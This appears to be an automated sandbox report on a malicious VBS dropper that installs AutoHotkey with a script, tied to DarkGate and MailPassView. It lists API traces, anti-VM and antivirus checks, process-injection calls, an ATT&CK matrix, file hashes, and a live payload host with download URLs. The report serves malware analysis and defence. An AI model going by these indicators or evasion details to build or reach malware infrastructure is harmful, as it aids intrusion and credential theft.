            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00473B90 SendMessageW,SendMessageW,SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageW,SendMessageW,ShowWindow,SetFocus,InvalidateRect,InvalidateRect,InvalidateRect,MapWindowPoints,InvalidateRect,1_2_00473B90
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0046FCD0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,1_2_0046FCD0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00445D30 SendMessageW,SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,1_2_00445D30
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0485D5DD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0485D5DD
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SUPERANTISPYWARE.EXE
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\NwiQ\AutoHotkey.exeEvaded block: after key decisiongraph_1-104188
            Source: C:\NwiQ\AutoHotkey.exeAPI coverage: 3.0 %
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004191F0 GetKeyboardLayout followed by cmp: cmp cl, 00000019h and CTI: ja 004192ECh country: Russian (ru)1_2_004191F0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0040C240 GetKeyboardLayout followed by cmp: cmp dword ptr [004db42ch], edi and CTI: je 0040C414h1_2_0040C240
            Source: C:\Windows\System32\wscript.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00480DC0 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,1_2_00480DC0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,1_2_0045E220
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0047C320 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,1_2_0047C320
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044D570 FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__swprintf,FindNextFileW,FindClose,1_2_0044D570
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044D870 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,1_2_0044D870
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00437B70 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose,1_2_00437B70
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044DBB0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,1_2_0044DBB0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00480D30 FindFirstFileW,FindClose,GetFileAttributesW,1_2_00480D30
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045EEA0 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,_wcsrchr,_wcsrchr,_wcsncpy,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose,1_2_0045EEA0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048495A1 FindFirstFileA,GetLastError,1_2_048495A1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489C541 FindFirstFileW,FindNextFileW,FindClose,1_2_0489C541
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0484655D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_0484655D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489B145 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,1_2_0489B145
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04876FE5 FindFirstFileW,FindNextFileW,FindClose,1_2_04876FE5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04873871 FindFirstFileW,FindNextFileW,FindClose,1_2_04873871
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04871EA9 GetSystemInfo,1_2_04871EA9
            Source: AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: vmware
            Source: wscript.exe, 00000000.00000003.1651614571.000001D5A5F25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Registry\Machine\Software\Classes\SystemFileAssociations\compressed\SystemFileAssociations\compressed}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}stem32
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
            Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660535194.000001D5A5EE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
            Source: AutoHotkey.exe, 00000001.00000002.1665231870.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\NwiQ\AutoHotkey.exe Process information queried: ProcessInformation
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00416450 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput,1_2_00416450
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0049E2D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0049E2D5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A5040 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004A5040
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486A0F5 mov eax, dword ptr fs:[00000030h]1_2_0486A0F5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04867B0D mov eax, dword ptr fs:[00000030h]1_2_04867B0D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048B3EEA mov eax, dword ptr fs:[00000030h]1_2_048B3EEA
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A93DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_004A93DE
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0049E2D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0049E2D5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A1856 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004A1856

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe File created: AutoHotkey.exe.0.dr
            Source: C:\Windows\System32\wscript.exe Network Connect: 205.234.201.153 80
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486DC09 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,1_2_0486DC09
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0043B100 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,__swprintf,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,1_2_0043B100
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00418020 keybd_event,GetTickCount,GetForegroundWindow,GetWindowTextW,1_2_00418020
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004172F0 GetAsyncKeyState,GetSystemMetrics,GetSystemMetrics,GetCursorPos,WindowFromPoint,GetWindowThreadProcessId,SendMessageW,mouse_event,mouse_event,1_2_004172F0
            Source: C:\Windows\System32\wscript.exe Process created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"
            Source: AutoHotkey.exeBinary or memory string: Program Manager
            Source: AutoHotkey.exeBinary or memory string: Shell_TrayWnd
            Source: AutoHotkey.exe.0.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,1_2_04846735
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetLocaleInfoA,GetACP,1_2_0484D6F5
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetLocaleInfoA,1_2_0484C08D
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetLocaleInfoA,1_2_04847089
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetLocaleInfoA,1_2_0484C0D9
            Source: C:\NwiQ\AutoHotkey.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,1_2_0484683F
            Source: C:\NwiQ\AutoHotkey.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\NwiQ\AutoHotkey.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
            Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe Queries volume information: C:\ VolumeInformation
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0041EF50 GetFileAttributesW,SetCurrentDirectoryW,GetSystemTimeAsFileTime,1_2_0041EF50
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044F450 GetComputerNameW,GetUserNameW,1_2_0044F450
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0041A00E RtlGetVersion,__snwprintf,1_2_0041A00E
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: superantispyware.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
            Source: Yara match | File source: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: AutoHotkey.exe | Binary or memory string: WIN_XP
            Source: AutoHotkey.exe.0.dr | Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingleWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%Ix*pPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkCountarraypcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCallbackCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameWpsapi
            Source: AutoHotkey.exe | Binary or memory string: WIN_VISTA
            Source: AutoHotkey.exe | Binary or memory string: WIN_7
            Source: AutoHotkey.exe | Binary or memory string: WIN_8
            Source: AutoHotkey.exe | Binary or memory string: WIN_8.1

            Remote Access Functionality

            Source: Yara match | File source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
            Source: C:\NwiQ\AutoHotkey.exe | Code function: 1_2_0041E430 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,1_2_0041E430
            Source: C:\NwiQ\AutoHotkey.exe | Code function: 1_2_0041D9D0 Shell_NotifyIconW,RemoveClipboardFormatListener,ChangeClipboardChain,DestroyWindow,DestroyWindow,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,mciSendStringW,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,_free,_free,_free,1_2_0041D9D0
            Source: C:\NwiQ\AutoHotkey.exe | Code function: 1_2_0485CA8D bind,1_2_0485CA8D
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 221 Scripting | Valid Accounts | 2 Native API | 221 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 121 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | 1 Create Account | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 121 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 312 Process Injection | 1 DLL Side-Loading | NTDS | 57 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 131 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 312 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

            Source | Detection | Scanner | Label
            ndvdikok.vbs | 8% | ReversingLabs |
            ndvdikok.vbs | 15% | Virustotal |

            Source | Detection | Scanner | Label
            C:\NwiQ\AutoHotkey.exe | 4% | ReversingLabs |
            C:\NwiQ\AutoHotkey.exe | 1% | Virustotal |

            No Antivirus matches

            Source | Detection | Scanner | Label
            backupssupport.com | 0% | Virustotal |

            Source | Detection | Scanner | Label
            https://autohotkey.comCould | 0% | URL Reputation | safe
            http://backupssupport.com/fykbmgszj | 1% | Virustotal |
            http://backupssupport.com/fykbmgsz | 0% | Virustotal |

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            backupssupport.com | 205.234.201.153 | true | true | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            http://backupssupport.com/fykbmgsz | true | | unknown

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://backupssupport.com/fykbmgszj | wscript.exe, 00000000.00000003.1656750950.000001D5A3C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1659182934.000001D5A3C9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://autohotkey.com | AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.dr | false | | high
            http://backupssupport.com/fykbmgsz6 | wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://autohotkey.comCould | AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.dr | false | URL Reputation: safe | unknown

                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                205.234.201.153 | backupssupport.com | United States | | 23352 | SERVERCENTRALUS | true

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1427163
                Start date and time:2024-04-17 06:39:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 37s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:ndvdikok.vbs
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winVBS@3/7@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 62
                • Number of non-executed functions: 252
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Stop behavior analysis, all processes terminated
                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                06:39:56 | API Interceptor | 1x Sleep call for process: AutoHotkey.exe modified
                No context
                No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                SERVERCENTRALUS | https://ym6hc4gbb.cc.rs6.net/tn.jsp?f=001n209emIAeC5QJJGtmLyCc1JCQhC6WWTJBpDN65UPPB3G7Jc3gS6FE5wY-dlsmfGB2oibtx69nM243xkUAk5hSfd1krgPjddqmNEffcBMlXoUc-7UzTKQzIO6cFbowvNDiHeCqkvDBf2IjYJyuuzL-7jENnNra-V4&c=&ch=&__=///cpsess/guytrscdvfhgjbknkghjfbghklnm/hgjbdsaknjaxbgrak/ryan_howard@office.com | malicious | HTMLPhisher | 205.234.232.49
                SERVERCENTRALUS | Scan001-929999.exe | malicious | FormBook | 198.38.83.196
                SERVERCENTRALUS | Axis Bank - 67 Account Pending Bank Receipt.pdf.exe | malicious | FormBook, PureLog Stealer | 198.38.83.196
                SERVERCENTRALUS | YzMjpENqal.elf | malicious | Mirai, Moobot | 75.102.41.230
                SERVERCENTRALUS | 2OVvfRwf5G.dll | malicious | PikaBot | 198.38.94.213
                SERVERCENTRALUS | 2OVvfRwf5G.dll | malicious | PikaBot | 198.38.94.213
                SERVERCENTRALUS | Total Energies RFQ.exe | malicious | FormBook | 198.38.83.196
                SERVERCENTRALUS | 6772.png.dll | malicious | Unknown | 198.38.94.213
                SERVERCENTRALUS | 6772.png.dll | malicious | Unknown | 198.38.94.213
                SERVERCENTRALUS | 7668.png.dll | malicious | Unknown | 198.38.94.213
                No context
                Match | Associated Sample Name / URL | Detection | Threat Name
                C:\NwiQ\AutoHotkey.exe | 4_10_AC-7539.xlsx | malicious | DarkGate, MailPassView
                C:\NwiQ\AutoHotkey.exe | statapril2024-5892.xlsx | malicious | DarkGate, MailPassView
                C:\NwiQ\AutoHotkey.exe | statapril2024-7320.xlsx | malicious | DarkGate, MailPassView
                C:\NwiQ\AutoHotkey.exe | MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs | malicious | DarkGate, MailPassView
                C:\NwiQ\AutoHotkey.exe | 30ab11853092ccfc7359bb9cf99fe27b2179a1dc11037515b9367b6c28395850.zip | malicious | DarkGate, MailPassView
                C:\NwiQ\AutoHotkey.exe | Report-26-2024.vbs | malicious | DarkGate, MailPassView
                C:\NwiQ\AutoHotkey.exe | march19-D8176-2024.xlsx | malicious | DarkGate, MailPassView
                C:\NwiQ\AutoHotkey.exe | march19-D5116-2024.xlsx | malicious | MailPassView
                C:\NwiQ\AutoHotkey.exe | march19-D8295-2024.xlsx | malicious | DarkGate, MailPassView
                C:\NwiQ\AutoHotkey.exe | march19-D2816-2024.xlsx | malicious | MailPassView

                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):913920
                                    Entropy (8bit):6.508000668604986
                                    Encrypted:false
                                    SSDEEP:24576:bGzl9+a4Ne1nEFI56xU+0IdY2Zv952uetfbFEzP4UFhOt:b+tOWnEFZR0El0JEzQAh
                                    MD5:A59A2D3E5DDA7ACA6EC879263AA42FD3
                                    SHA1:312D496EC90EB30D5319307D47BFEF602B6B8C6C
                                    SHA-256:897B0D0E64CF87AC7086241C86F757F3C94D6826F949A1F0FEC9C40892C0CECB
                                    SHA-512:852972CA4D7F9141EA56D3498388C61610492D36EA7D7AF1B36D192D7E04DD6D9BC5830E0DCB0A5F8F55350D4D8AAAC2869477686B03F998AFFBAC6321A22030
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 4%
                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                    Joe Sandbox View:
                                    • Filename: 4_10_AC-7539.xlsx, Detection: malicious, Browse
                                    • Filename: statapril2024-5892.xlsx, Detection: malicious, Browse
                                    • Filename: statapril2024-7320.xlsx, Detection: malicious, Browse
                                    • Filename: MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs, Detection: malicious, Browse
                                    • Filename: 30ab11853092ccfc7359bb9cf99fe27b2179a1dc11037515b9367b6c28395850.zip, Detection: malicious, Browse
                                    • Filename: Report-26-2024.vbs, Detection: malicious, Browse
                                    • Filename: march19-D8176-2024.xlsx, Detection: malicious, Browse
                                    • Filename: march19-D5116-2024.xlsx, Detection: malicious, Browse
                                    • Filename: march19-D8295-2024.xlsx, Detection: malicious, Browse
                                    • Filename: march19-D2816-2024.xlsx, Detection: malicious, Browse
                                    Reputation:moderate, very likely benign file
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):795674
                                    Entropy (8bit):7.994720720467439
                                    Encrypted:true
                                    SSDEEP:24576:iDv3cPduvcaRMi59YF7neQfxdIhjRT2Wrp:ij9kBi7kLeQydT2Wrp
                                    MD5:60817831FC3EA259D45C9A537172F080
                                    SHA1:BC6BE7D44565B13E1008A3B962ABC9BC6EE44217
                                    SHA-256:75D89FD4AA29E97E8859BDF734602490DA0F90A4FD5213F737857D971C82E80C
                                    SHA-512:02FC5B1202897E0D1D99FF636AB43B9D4BB6335F1FC538BD63D361B4025584F8196504F4366668DC919C1C8CB52EEA3742FDF8746748DAE00BEF4AF0C606EBDD
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):441
